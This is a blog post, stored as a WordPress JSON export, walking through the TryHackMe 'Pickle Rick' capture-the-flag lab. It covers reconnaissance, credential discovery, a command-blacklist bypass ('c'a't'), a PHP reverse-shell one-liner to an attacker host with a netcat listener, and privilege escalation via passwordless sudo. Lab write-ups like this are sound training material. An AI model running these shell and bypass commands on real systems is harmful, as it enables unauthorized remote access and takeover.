{"id":164,"date":"2023-03-25T11:35:48","date_gmt":"2023-03-25T16:35:48","guid":{"rendered":"https:\/\/binaryblisters.com\/?p=164"},"modified":"2023-04-14T15:34:26","modified_gmt":"2023-04-14T20:34:26","slug":"thm-pickle-rick-lab-walkthrough","status":"publish","type":"post","link":"https:\/\/binaryblisters.com\/?p=164","title":{"rendered":"Try Hack Me &#8211; Pickle Rick Lab Walkthrough"},"content":{"rendered":"\n<p>So, I decided I would give this a try and do a post on the latest lab I just completed. I know I&#8217;m one in a million, but I figured it would be good to keep track of my progress. This lab was part of a series on Web Vulnerabilities and was the final module I completed. Overall, I thought it was pretty good and compared to HTB, it was fairly easy. I only needed one hint throughout the lab, which I&#8217;ll cover in more detail further down in the post.<\/p>\n\n\n\n<p>So let&#8217;s go ahead and begin. To start, I used Gitbook to keep notes and also to help me keep notes when I&#8217;m working on labs. It&#8217;s extremely useful, and I highly recommend it. My first few notebooks looked like crap, but I&#8217;m getting better at organizing my findings and results.<\/p>\n\n\n\n<p>I went ahead and provided my OG notes from Gitbook below in case anyone wants to go through them. It&#8217;s a little chaotic but I&#8217;m getting better.<\/p>\n\n\n\n<p><a href=\"https:\/\/sgtdiddlywink.gitbook.io\/thm\/\">https:\/\/sgtdiddlywink.gitbook.io\/thm\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1006\" height=\"543\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image.png\" alt=\"\" class=\"wp-image-165\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image.png 1006w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-300x162.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-768x415.png 768w\" sizes=\"auto, (max-width: 1006px) 100vw, 1006px\" \/><figcaption class=\"wp-element-caption\">&#8211; Home page from the IP given on the activated machine.<\/figcaption><\/figure>\n\n\n\n<p>So long story short, there are three ingredients (Flags) located on Rick&#8217;s computer (Target Machine). Don&#8217;t get me wrong, the show is hilarious and my wife and I binge every season that comes out but for this write-up, I&#8217;m going to stick with the terminology of &#8220;Flags&#8221;, &#8220;Target Machine&#8221;, and &#8220;Host Machine&#8221;.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reconnaissance (I like to call it Scouting but that&#8217;s just me)<\/h2>\n\n\n\n<p>I first started by traveling to the IP given. In this writeup, we&#8217;ll just call it [TARGET IP].<\/p>\n\n\n\n<p><strong>http:\/\/[TARGET IP]<\/strong><\/p>\n\n\n\n<p>This gives me the home page screen you see above and some basic information on the goal of the lab. Before I dive into any tools, I like to first look at the page source code for any possible nuggets of information. <\/p>\n\n\n\n<p><strong>Right-Click &#8211;> View Page Source<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-1-1024x538.png\" alt=\"\" class=\"wp-image-166\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-1-1024x538.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-1-300x158.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-1-768x403.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-1.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Right off the bat, we got some great intel. In the comments, the target has put a username: <strong>R1ckRul3s<\/strong><\/p>\n\n\n\n<p>I went ahead and checked Wappalyzer as well to confirm a Linux OS. Nothing to note on the backend language yet. This won&#8217;t bite me in the butt later.<\/p>\n\n\n\n<p>I decided to run some nmap scans for the heck of it to see if anything of note would pop up. I found that port 22 and 80 were open but the rest were closed which would make sense since this is a webapp lab.<\/p>\n\n\n\n<p>I ran the following to get more info on the versions:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -sC -sV -p 80,22 &#91;TARGET IP]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>nmap<\/td><td>nmap command to scan for open ports<\/td><\/tr><tr><td>-sC<\/td><td>Flag to perform basic scripts on open ports to gather more info<\/td><\/tr><tr><td>-sV<\/td><td>Flag to gather version information on services running on the open ports<\/td><\/tr><tr><td>-p 80, 22<\/td><td>Flag to designate which specific ports to scan. In this case ports 22 &amp; 80<\/td><\/tr><tr><td>[TARGET IP]<\/td><td>The target IP address you want to scan<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>I&#8217;ll ignore port 22 for now as we are not exploring SSH but it looks like Port 80 is running an Apache WebServer which Wappalyzer also confirmed.<\/p>\n\n\n\n<p>I spent more time than what was needed to explore but will save you the trouble and tell you to move on to enumeration.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration<\/h2>\n\n\n\n<p>My first go-to is always gobuster. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/&#91;TARGET IP]\/ -w &#91;PATH TO WORD LIST]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>gobuster<\/td><td>gobuster command to enumerate for possible subdomains to a chosen URL<\/td><\/tr><tr><td>dir<\/td><td>Option to enumerate for directories<\/td><\/tr><tr><td>-u http:\/\/[TARGET IP]\/<\/td><td>Flag to specify the URL you are targeting<\/td><\/tr><tr><td>-w [PATH TO WORD LIST]<\/td><td>Flag to specify the location of the word list to use for enumeration<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"865\" height=\"592\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-2.png\" alt=\"\" class=\"wp-image-167\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-2.png 865w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-2-300x205.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-2-768x526.png 768w\" sizes=\"auto, (max-width: 865px) 100vw, 865px\" \/><\/figure>\n\n\n\n<p>So I found quite a few subdomains. I decided to explore them all to make sure I wasn&#8217;t missing anything.<\/p>\n\n\n\n<p>The two interesting subdomains were <strong>\/assets<\/strong> and <strong>\/robots.txt<\/strong>. The <strong>\/assets<\/strong> subdomain didn&#8217;t prove really useful as it only carried the basics of the website.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"535\" height=\"373\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-3.png\" alt=\"\" class=\"wp-image-168\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-3.png 535w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-3-300x209.png 300w\" sizes=\"auto, (max-width: 535px) 100vw, 535px\" \/><\/figure>\n\n\n\n<p>The <strong>\/robots.txt<\/strong> was really interesting as it didn&#8217;t have the basic information you&#8217;d find in a robots.txt file. Instead, it only had one line of text:<\/p>\n\n\n\n<p><strong>Wubbalubbadubdub<\/strong><\/p>\n\n\n\n<p>For those of you familiar with Rick and Morty I don&#8217;t need to explain this. For those who are not, here you <a href=\"https:\/\/www.youtube.com\/watch?v=NR8EjXXoPsM\">go<\/a>.<\/p>\n\n\n\n<p>I figured they wouldn&#8217;t put it here for anything so I kept it in my notes and that is where I got stuck. I spent the next hour trying different enumerations and scoping the sites out and capturing packets with Burpsuite but still no luck. <\/p>\n\n\n\n<p>So, I looked up a hint and felt like an idiot afterward. I forgot to look into the backend scripting language. Hint for you all, it&#8217;s PHP.<\/p>\n\n\n\n<p>So now that I know that, I went back and ran another gobuster scan with the .php file extension to see what it would come up with.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/&#91;TARGET IP]\/ -w &#91;PATH TO WORD LIST] -x php<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>gobuster<\/td><td>gobuster command to enumerate possible subdomains to a chosen URL<\/td><\/tr><tr><td>dir<\/td><td>Option to enumerate for directories<\/td><\/tr><tr><td>-u http:\/\/[TARGET IP]\/<\/td><td>Flag to specify the URL you are targeting<\/td><\/tr><tr><td>-w [PATH TO WORD LIST]<\/td><td>Flag to specify the location of the word list to use for enumeration<\/td><\/tr><tr><td>-x php<\/td><td>Flag to that will append a file extension to each word from the wordlist. In this case, it is a .php<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"941\" height=\"750\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-4.png\" alt=\"\" class=\"wp-image-169\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-4.png 941w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-4-300x239.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-4-768x612.png 768w\" sizes=\"auto, (max-width: 941px) 100vw, 941px\" \/><\/figure>\n\n\n\n<p>Long behold, there is what I was looking for. A login page. I explored the other new subdomains but they all redirected to the<strong> \/login.php<\/strong> subdomain.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"477\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-5-1024x477.png\" alt=\"\" class=\"wp-image-170\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-5-1024x477.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-5-300x140.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-5-768x358.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-5.png 1195w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>So this is where I got lucky. I already knew the username of <strong>R1ckRul3s<\/strong> from above but what about a password? Well, I always try &#8220;password&#8221; as a first guess. I know it probably won&#8217;t ever work but figured I&#8217;d give it a try anyway.<\/p>\n\n\n\n<p>It didn&#8217;t work, which was no surprise. I was about to start into the page&#8217;s source code but figured I&#8217;d give it another try at the password. I recalled the phrase that was on the <strong>\/robots.txt<\/strong> page <strong>Wubbalubbadubdub<\/strong>.<\/p>\n\n\n\n<p>What do you know, that was the password. Seems dumb and easy but this is supposed to be an easy lab so I&#8217;ll take it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Back to Scouting<\/h2>\n\n\n\n<p>After logging in, you get sent to the <strong>\/portal.php<\/strong> subdomain which works once you have a valid SessionID (You can go down that Burpsuite rabbit hole as I did but you won&#8217;t find anything useful).<\/p>\n\n\n\n<p>This page seems to have a command prompt to it which is kind of cool.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"384\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-6-1024x384.png\" alt=\"\" class=\"wp-image-171\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-6-1024x384.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-6-300x112.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-6-768x288.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-6.png 1206w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I first explored the page source code. <\/p>\n\n\n\n<p><strong>Right-Click &#8211;> View Page Source<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"572\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-8.png\" alt=\"\" class=\"wp-image-173\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-8.png 972w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-8-300x177.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-8-768x452.png 768w\" sizes=\"auto, (max-width: 972px) 100vw, 972px\" \/><\/figure>\n\n\n\n<p>You can skip this part if you want because it&#8217;s pointless but figured I&#8217;d tell you how I wasted too much time here. I saw that at the bottom of the page source, they had a commented-out line of text that suspiciously looked like Base64 encryption.<\/p>\n\n\n\n<p>Well, the last commented-out text I found in the page source was a password so this has to be something good right? Spoiler, it&#8217;s not.<\/p>\n\n\n\n<p>I went ahead and decrypted it with a <a href=\"https:\/\/www.base64decode.org\/\">Base64 decryptor<\/a>. I got gibberish back.<\/p>\n\n\n\n<p>I originally thought that maybe it wasn&#8217;t Base64 and I went off chasing other leads. After a bit more research I was positive that it was Base64. So for the fun of it, I decided why not just decrypt it over and over to see if anything pops up.<\/p>\n\n\n\n<p>After a few decryptions, I was about to give up but long behold after about the 5th or 6th decryption, I get the phrase rabbit hole. Which is exactly what I fell down and wasted a lot of time on. <\/p>\n\n\n\n<p>It was funny in an irritating way and sorry if you hung around to read that all but I wanted to share that little bit of annoyance with you all. For those wondering, I did plug it in in other areas throughout the exploration but never got anything back. Leave no stone unturned.<\/p>\n\n\n\n<p>So let&#8217;s get back on track.<\/p>\n\n\n\n<p>Back to the <strong>\/portal.php<\/strong> page, I tried the usual <strong>whoami<\/strong>, <strong>pwd<\/strong>, and <strong>ls<\/strong> in the command panel. That last one gave me what I needed.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"282\" height=\"175\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-7.png\" alt=\"\" class=\"wp-image-172\"\/><\/figure>\n\n\n\n<p>It looks like the first ingredient is listed there. However, trying cat or head to see the file didn&#8217;t work due to a blacklist of commands on the backend. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"395\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-9.png\" alt=\"\" class=\"wp-image-174\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-9.png 566w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/03\/image-9-300x209.png 300w\" sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/figure>\n\n\n\n<p>That&#8217;s okay. We can work around that. After some trial and error, I found a few means to view the contents of the file.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>less Sup3rS3cretPickl3Ingred.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>c'a't Sup3rS3cretPickl3Ingred.txt<\/code><\/pre>\n\n\n\n<p>It looks like not everything got blacklisted. I used a list of bypasses from <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/Command%20Injection\">PayloadsAllTheThings<\/a> to help with this.<\/p>\n\n\n\n<p>It looks like the first ingredient is <strong>mr.meeseek hair<\/strong>. Once again, for those who don&#8217;t know, here you <a href=\"https:\/\/www.youtube.com\/watch?v=l4iZtDBYkZA\">go<\/a>.<\/p>\n\n\n\n<p>Next, I checked the <strong>clue.txt<\/strong> which was also listed with the same bypass:<\/p>\n\n\n\n<p><strong>Look around the file system for the other ingredient.<\/strong><\/p>\n\n\n\n<p>I attempted to explore the rest of the site, including the tabs at the top but did not find anything to note other than disabled pages.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Exploitation<\/h2>\n\n\n\n<p>I decided to start seeing what I could do with the command panel given on the <strong>\/portal.php<\/strong> subdomain.<\/p>\n\n\n\n<p>Not a whole lot as it looks like it restricts access to most things. So let&#8217;s see what <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Reverse%20Shell%20Cheatsheet.md#bash-tcp\">PayloadsAllTheThings<\/a> has.<\/p>\n\n\n\n<p>I went down the list of possible exploits and finally got the following to work with a netcat listener on my Host Machine.<\/p>\n\n\n\n<p>On my Host Machine I started up the netcat listener for port 4444:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc -lvnp 4444<\/code><\/pre>\n\n\n\n<p>In the Command Panel of the <strong>\/portal.php<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>php -r '$sock=fsockopen(\"&#91;HOST IP]\",4444);$proc=proc_open(\"\/bin\/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'<\/code><\/pre>\n\n\n\n<p>This gave me RCE to the Target Machine. Next, I wanted a more friendly interactive terminal so I used the following script to create one. Not necessary but helpful.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n\n\n\n<p>I was just a user on the machine but still have access to quite a bit. After some browsing through the file system, I finally found the second ingredient in <strong>\/home\/rick <\/strong>&#8211;> <strong>1 jerry tear<\/strong>.<\/p>\n\n\n\n<p>I explored more of the system as a regular user but wasn&#8217;t finding the third ingredient. I figured it had to be in one of the directories that are only available to root.<\/p>\n\n\n\n<p>I started browsing around for methods to escalate privileges. I tried a few methods but didn&#8217;t get anywhere and assumed I was making it more difficult than need be. So I backed up and simply tried the following to see what would happen&#8221;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo su<\/code><\/pre>\n\n\n\n<p>And that was it. No password or anything else. I am now root.<\/p>\n\n\n\n<p>After a bit more exploration I found the third ingredient in the <strong>\/root\/3rd.txt<\/strong> file &#8211;> <strong>fleeb juice<\/strong>.<\/p>\n\n\n\n<p>That was it. Easy.<\/p>\n\n\n\n<p>Well, it took me about 6hrs to finish but that&#8217;s because I made it way more difficult than it needs to be. So, hopefully, this can help you. I linked my original notes to this lab at the top if you want to follow my entire methodology and thought process. Forewarning, there are a lot of dead ends and things I explored that was absolutely pointless.<\/p>\n\n\n\n<p>But that&#8217;s okay. It&#8217;s just how I work through a problem. So tell me how you did or if you did something differently.<\/p>\n\n\n\n<p>I appreciate you reading through this post and I&#8217;ll try to do more of these in the future. <\/p>\n\n\n\n<p>Thanks for reading,<\/p>\n\n\n\n<p>sgtdiddlywink<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So, I decided I would give this a try and do a post on the latest lab I just completed. I know I&#8217;m one in a million, but I figured it would be good to keep track of my progress. This lab was part of a series on Web Vulnerabilities and was the final module [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,48,49],"tags":[18,52,51,50],"class_list":["post-164","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-coding","category-hacking","category-thm","tag-hacking","tag-rickandmorty","tag-thm","tag-tryhackme"],"_links":{"self":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=164"}],"version-history":[{"count":2,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164\/revisions\/256"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/media\/175"}],"wp:attachment":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}